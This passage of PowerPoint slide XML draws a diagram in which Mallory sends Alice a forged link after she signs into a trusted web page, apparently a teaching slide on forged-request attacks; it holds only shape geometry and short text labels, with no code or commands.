                    <a:pt x="13406765" y="5537140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13422456" y="5495968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13432222" y="5452229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13435583" y="5406402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13435583" y="310133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13432222" y="264295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13422456" y="220548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13406765" y="179371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13385629" y="141244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13359527" y="106646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13328937" y="76056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13294339" y="49954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13256212" y="28818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13215035" y="13127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13171288" y="3361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13125450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945130" y="5907912"/>
              <a:ext cx="3595370" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3595370" h="142875">
                  <a:moveTo>
                    <a:pt x="3452368" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3452368" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3566769" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3466719" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3466719" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3566566" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3452368" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3595370" h="142875">
                  <a:moveTo>
                    <a:pt x="3452368" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3452368" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3452368" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3595370" h="142875">
                  <a:moveTo>
                    <a:pt x="3566566" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3466719" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3466719" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3566769" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3595243" y="71500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3566566" y="5715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346198" y="2916173"/>
            <a:ext cx="79502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165" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y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313432" y="3380232"/>
            <a:ext cx="1096010" cy="4204335"/>
            <a:chOff x="2313432" y="3380232"/>
            <a:chExt cx="1096010" cy="420433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3432" y="3380232"/>
              <a:ext cx="859536" cy="85953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672461" y="4316856"/>
              <a:ext cx="737235" cy="3267710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="737235" h="3267709">
                  <a:moveTo>
                    <a:pt x="143002" y="3196082"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="137375" y="3168256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122059" y="3145523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99326" y="3130207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85839" y="3127476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85852" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85737" y="3127464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85839" y="3124581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1662938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="1604645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85725" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142875" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137274" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121996" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99314" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="5626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="20942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="43675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5613" y="99326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20929" y="122008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43662" y="137287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="139992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="71501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57251" y="140017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1604645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57150" y="1662938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57264" y="3127464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43675" y="3130207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20993" y="3145523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5715" y="3168256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="3196082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5715" y="3223907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20993" y="3246590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43675" y="3261868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71501" y="3267456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99326" y="3261868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122059" y="3246590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137375" y="3223907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143002" y="3196082"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="737235" h="3267709">
                  <a:moveTo>
                    <a:pt x="736727" y="2218817"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="730910" y="2190077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715048" y="2166582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691553" y="2150719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662813" y="2144903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367157" y="2144903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338404" y="2150719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314909" y="2166582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299046" y="2190077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293243" y="2218817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293243" y="2534285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299046" y="2563037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314909" y="2586532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338404" y="2602395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367157" y="2608199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662813" y="2608199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691553" y="2602395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715048" y="2586532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730910" y="2563037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736727" y="2534285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736727" y="2218817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2346198" y="7700264"/>
            <a:ext cx="79502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165" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y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118230" y="6549643"/>
            <a:ext cx="1416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20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17467" y="6424371"/>
            <a:ext cx="218122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600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Mallo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sen</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-55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dirty="0" sz="1600" spc="-10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5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dirty="0" sz="1600" spc="-9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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rged</a:t>
            </a:r>
            <a:endParaRPr sz="16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600" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>link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221479" y="4733544"/>
            <a:ext cx="3427729" cy="1563370"/>
            <a:chOff x="4221479" y="4733544"/>
            <a:chExt cx="3427729" cy="1563370"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4371593" y="5583174"/>
              <a:ext cx="574675" cy="701040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="574675" h="701039">
                  <a:moveTo>
                    <a:pt x="478789" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="701039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574547" y="701039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574547" y="95758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4787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371593" y="5583174"/>
              <a:ext cx="574675" cy="701040"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="574675" h="701039">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="478789" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574547" y="95758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574547" y="701039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="70103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421885" y="5764530"/>
              <a:ext cx="455930" cy="388620"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="388620">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366649" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="455929" h="388620">
                  <a:moveTo>
                    <a:pt x="0" y="97536"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455929" y="97536"/>
                  </a:lnTo>
                </a:path>
                <a:path w="455929" h="388620">
                  <a:moveTo>
                    <a:pt x="0" y="193548"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455929" y="193548"/>
                  </a:lnTo>
                </a:path>
                <a:path w="455929" h="388620">
                  <a:moveTo>
                    <a:pt x="0" y="291084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455929" y="291084"/>
                  </a:lnTo>
                </a:path>
                <a:path w="455929" h="388620">
                  <a:moveTo>
                    <a:pt x="0" y="388620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="455929" y="388620"/>
                  </a:lnTo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05806" y="5550280"/>
              <a:ext cx="175005" cy="17373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21479" y="5798819"/>
              <a:ext cx="300227" cy="30175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205472" y="4733544"/>
              <a:ext cx="443865" cy="464820"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="443865" h="464820">
                  <a:moveTo>
                    <a:pt x="369570" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73913" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45166" y="5816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21669" y="21669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5816" y="45166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="73913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="390905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5816" y="419653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21669" y="443150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45166" y="459003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73913" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369570" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398317" y="459003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421814" y="443150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437667" y="419653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443483" y="390905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443483" y="73913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437667" y="45166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421814" y="21669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398317" y="5816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369570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7357364" y="4821428"/>
            <a:ext cx="1416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20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794497" y="4696714"/>
            <a:ext cx="167449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85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Al</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-3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dirty="0" sz="1600" spc="-10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6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dirty="0" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ig</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ns</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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55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dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-9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dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-10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>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-2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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>age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896861" y="5260212"/>
            <a:ext cx="3595370" cy="1758314"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3595370" h="1758315">
                <a:moveTo>
                  <a:pt x="752094" y="1368425"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="746277" y="1339684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="730415" y="1316189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706920" y="1300327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180" y="1294511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382524" y="1294511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353771" y="1300327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330276" y="1316189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314413" y="1339684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308610" y="1368425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308610" y="1683893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314413" y="1712645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330276" y="1736140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353771" y="1752003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382524" y="1757807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678180" y="1757807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706920" y="1752003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="730415" y="1736140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="746277" y="1712645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752094" y="1683893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752094" y="1368425"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3595370" h="1758315">
                <a:moveTo>
                  <a:pt x="3595243" y="71501"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3566566" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452368" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452368" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452368" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452368" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3566769" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3595243" y="71501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0771885" y="4696714"/>
            <a:ext cx="48577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72440" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2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dirty="0" u="heavy" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>	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tabLst>
                <a:tab pos="472440" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2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dirty="0" u="heavy" sz="1600" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="5496D2"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>	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357364" y="6642607"/>
            <a:ext cx="1416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20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352156" y="7171435"/>
            <a:ext cx="2375535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 indent="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Al</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-3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dirty="0" sz="1600" spc="-10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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-75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dirty="0" sz="1600" spc="-10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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-40">
                <a:solidFill>
